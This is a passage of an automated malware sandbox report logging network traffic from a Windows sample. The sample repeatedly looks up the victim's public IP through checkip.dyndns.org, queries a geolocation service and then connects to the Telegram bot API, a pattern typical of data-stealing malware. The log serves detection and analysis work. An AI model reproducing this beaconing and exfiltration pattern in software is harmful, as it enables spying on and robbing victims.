                                                                                          Jan 6, 2025 07:41:08.359860897 CET49703443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:08.366924047 CET49703443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:08.411346912 CET44349703188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:08.478785038 CET44349703188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:08.478852034 CET44349703188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:08.478939056 CET49703443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:08.488152981 CET49703443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:08.495987892 CET4970180192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:08.501036882 CET8049701132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:10.763484001 CET8049701132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:10.766882896 CET49706443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:10.766917944 CET44349706188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:10.766979933 CET49706443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:10.767246962 CET49706443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:10.767260075 CET44349706188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:10.813013077 CET4970180192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:11.226516008 CET44349706188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:11.229691982 CET49706443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:11.229712009 CET44349706188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:11.372848034 CET44349706188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:11.372920990 CET44349706188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:11.372967958 CET49706443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:11.373390913 CET49706443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:11.390613079 CET4970180192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:11.392035961 CET4970780192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:11.395589113 CET8049701132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:11.395648956 CET4970180192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:11.396795034 CET8049707132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:11.396857977 CET4970780192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:11.396967888 CET4970780192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:11.401715994 CET8049707132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:14.171020031 CET8049707132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:14.172503948 CET49708443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:14.172544956 CET44349708188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:14.172749043 CET49708443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:14.172885895 CET49708443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:14.172898054 CET44349708188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:14.219249010 CET4970780192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:14.646442890 CET44349708188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:14.648080111 CET49708443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:14.648103952 CET44349708188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:14.779973984 CET44349708188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:14.780035019 CET44349708188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:14.780097008 CET49708443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:14.780615091 CET49708443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:14.789343119 CET4970780192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:14.794207096 CET4970980192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:14.794224977 CET8049707132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:14.794277906 CET4970780192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:14.798985958 CET8049709132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:14.799074888 CET4970980192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:14.799247026 CET4970980192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:14.804045916 CET8049709132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:15.574734926 CET8049709132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:15.575927973 CET49711443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:15.575963020 CET44349711188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:15.576021910 CET49711443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:15.576261044 CET49711443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:15.576275110 CET44349711188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:15.625492096 CET4970980192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:16.035630941 CET44349711188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:16.037473917 CET49711443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:16.037496090 CET44349711188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:16.165817976 CET44349711188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:16.165885925 CET44349711188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:16.165961027 CET49711443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:16.166328907 CET49711443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:16.183729887 CET4970980192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:16.184789896 CET4971780192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:16.188641071 CET8049709132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:16.188693047 CET4970980192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:16.189572096 CET8049717132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:16.189651012 CET4971780192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:16.189749002 CET4971780192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:16.194463968 CET8049717132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:19.941728115 CET8049717132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:19.984900951 CET4971780192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:20.101186037 CET4971780192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:20.105189085 CET4974180192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:20.106197119 CET8049717132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:20.106328964 CET4971780192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:20.110060930 CET8049741132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:20.110135078 CET4974180192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:20.110219955 CET4974180192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:20.115010023 CET8049741132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:20.921945095 CET8049741132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:20.923285007 CET49750443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:20.923326015 CET44349750188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:20.923394918 CET49750443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:20.923612118 CET49750443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:20.923625946 CET44349750188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:20.969278097 CET4974180192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:21.377892971 CET44349750188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:21.380403042 CET49750443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:21.380429983 CET44349750188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:21.513179064 CET44349750188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:21.513247967 CET44349750188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:21.513303995 CET49750443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:21.513662100 CET49750443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:21.517015934 CET4974180192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:21.518205881 CET4975380192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:21.521986008 CET8049741132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:21.522042036 CET4974180192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:21.523052931 CET8049753132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:21.523118019 CET4975380192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:21.523199081 CET4975380192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:21.528008938 CET8049753132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:22.372560024 CET8049753132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:22.374929905 CET49761443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:22.374960899 CET44349761188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:22.375036001 CET49761443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:22.375302076 CET49761443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:22.375319958 CET44349761188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:22.422409058 CET4975380192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:22.850096941 CET44349761188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:22.859841108 CET49761443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:22.859868050 CET44349761188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:22.998939037 CET44349761188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:22.998992920 CET44349761188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:22.999120951 CET49761443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:22.999409914 CET49761443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:23.003523111 CET4976680192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:23.008306026 CET8049766132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:23.008460045 CET4976680192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:23.008546114 CET4976680192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:23.013318062 CET8049766132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:23.799911976 CET8049766132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:23.801115036 CET49772443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:23.801147938 CET44349772188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:23.801254034 CET49772443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:23.801501989 CET49772443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:23.801515102 CET44349772188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:23.844305992 CET4976680192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:24.278697968 CET44349772188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:24.280160904 CET49772443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:24.280185938 CET44349772188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:24.431288004 CET44349772188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:24.431355000 CET44349772188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:24.431505919 CET49772443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:24.431802988 CET49772443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:24.434581995 CET4976680192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:24.435622931 CET4977880192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:24.441487074 CET8049766132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:24.441503048 CET8049778132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:24.441560984 CET4976680192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:24.441593885 CET4977880192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:24.441690922 CET4977880192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:24.446896076 CET8049778132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:25.205018044 CET8049778132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:25.206211090 CET49784443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:25.206227064 CET44349784188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:25.206305027 CET49784443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:25.207214117 CET49784443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:25.207223892 CET44349784188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:25.250550032 CET4977880192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:25.671058893 CET44349784188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:25.672611952 CET49784443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:25.672625065 CET44349784188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:25.823612928 CET44349784188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:25.823666096 CET44349784188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:25.824137926 CET49784443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:25.824434996 CET49784443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:25.838157892 CET4977880192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:25.843111992 CET8049778132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:25.843168020 CET4977880192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:25.846384048 CET49790443192.168.2.7149.154.167.220
                                                                                          Jan 6, 2025 07:41:25.846404076 CET44349790149.154.167.220192.168.2.7
                                                                                          Jan 6, 2025 07:41:25.846470118 CET49790443192.168.2.7149.154.167.220
                                                                                          Jan 6, 2025 07:41:25.846894026 CET49790443192.168.2.7149.154.167.220
                                                                                          Jan 6, 2025 07:41:25.846905947 CET44349790149.154.167.220192.168.2.7
                                                                                          Jan 6, 2025 07:41:26.456442118 CET44349790149.154.167.220192.168.2.7
                                                                                          Jan 6, 2025 07:41:26.456518888 CET49790443192.168.2.7149.154.167.220
                                                                                          Jan 6, 2025 07:41:26.459316969 CET49790443192.168.2.7149.154.167.220
                                                                                          Jan 6, 2025 07:41:26.459321976 CET44349790149.154.167.220192.168.2.7
                                                                                          Jan 6, 2025 07:41:26.459552050 CET44349790149.154.167.220192.168.2.7
                                                                                          Jan 6, 2025 07:41:26.460982084 CET49790443192.168.2.7149.154.167.220
                                                                                          Jan 6, 2025 07:41:26.503334045 CET44349790149.154.167.220192.168.2.7
                                                                                          Jan 6, 2025 07:41:26.698102951 CET44349790149.154.167.220192.168.2.7
                                                                                          Jan 6, 2025 07:41:26.698169947 CET44349790149.154.167.220192.168.2.7
                                                                                          Jan 6, 2025 07:41:26.698227882 CET49790443192.168.2.7149.154.167.220
                                                                                          Jan 6, 2025 07:41:26.698637009 CET49790443192.168.2.7149.154.167.220
                                                                                          Jan 6, 2025 07:41:32.494715929 CET4975380192.168.2.7132.226.8.169

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Jan 6, 2025 07:41:05.546231985 CET5727753192.168.2.71.1.1.1
                                                                                          Jan 6, 2025 07:41:05.553126097 CET53572771.1.1.1192.168.2.7
                                                                                          Jan 6, 2025 07:41:07.743949890 CET6009553192.168.2.71.1.1.1
                                                                                          Jan 6, 2025 07:41:07.751379013 CET53600951.1.1.1192.168.2.7
                                                                                          Jan 6, 2025 07:41:25.838936090 CET6232853192.168.2.71.1.1.1
                                                                                          Jan 6, 2025 07:41:25.845702887 CET53623281.1.1.1192.168.2.7

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Jan 6, 2025 07:41:05.546231985 CET192.168.2.71.1.1.10xea15Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                          Jan 6, 2025 07:41:07.743949890 CET192.168.2.71.1.1.10x68bdStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                          Jan 6, 2025 07:41:25.838936090 CET192.168.2.71.1.1.10x4e1cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Jan 6, 2025 07:41:05.553126097 CET1.1.1.1192.168.2.70xea15No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Jan 6, 2025 07:41:05.553126097 CET1.1.1.1192.168.2.70xea15No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                          Jan 6, 2025 07:41:05.553126097 CET1.1.1.1192.168.2.70xea15No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                          Jan 6, 2025 07:41:05.553126097 CET1.1.1.1192.168.2.70xea15No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                          Jan 6, 2025 07:41:05.553126097 CET1.1.1.1192.168.2.70xea15No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                          Jan 6, 2025 07:41:05.553126097 CET1.1.1.1192.168.2.70xea15No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                          Jan 6, 2025 07:41:07.751379013 CET1.1.1.1192.168.2.70x68bdNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                          Jan 6, 2025 07:41:07.751379013 CET1.1.1.1192.168.2.70x68bdNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                          Jan 6, 2025 07:41:25.845702887 CET1.1.1.1192.168.2.70x4e1cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                          HTTP Request Dependency Graph

                                                                                          • reallyfreegeoip.org
                                                                                          • api.telegram.org
                                                                                          • checkip.dyndns.org

                                                                                          HTTP Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.749701132.226.8.169807432C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 6, 2025 07:41:05.580152988 CET151OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Connection: Keep-Alive
                                                                                          Jan 6, 2025 07:41:07.447810888 CET273INHTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:07 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 104
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                          Jan 6, 2025 07:41:07.453089952 CET127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Jan 6, 2025 07:41:07.703239918 CET273INHTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:07 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 104
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                          Jan 6, 2025 07:41:08.495987892 CET127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Jan 6, 2025 07:41:10.763484001 CET273INHTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:10 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 104
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.749707132.226.8.169807432C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 6, 2025 07:41:11.396967888 CET127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Jan 6, 2025 07:41:14.171020031 CET273INHTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:14 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 104
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.749709132.226.8.169807432C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 6, 2025 07:41:14.799247026 CET127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Jan 6, 2025 07:41:15.574734926 CET273INHTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:15 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 104
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          3192.168.2.749717132.226.8.169807432C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 6, 2025 07:41:16.189749002 CET127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Jan 6, 2025 07:41:19.941728115 CET697INHTTP/1.1 504 Gateway Time-out
                                                                                          Date: Mon, 06 Jan 2025 06:41:19 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 557
                                                                                          Connection: keep-alive
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                          Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          4192.168.2.749741132.226.8.169807432C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 6, 2025 07:41:20.110219955 CET127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Jan 6, 2025 07:41:20.921945095 CET273INHTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:20 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 104
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
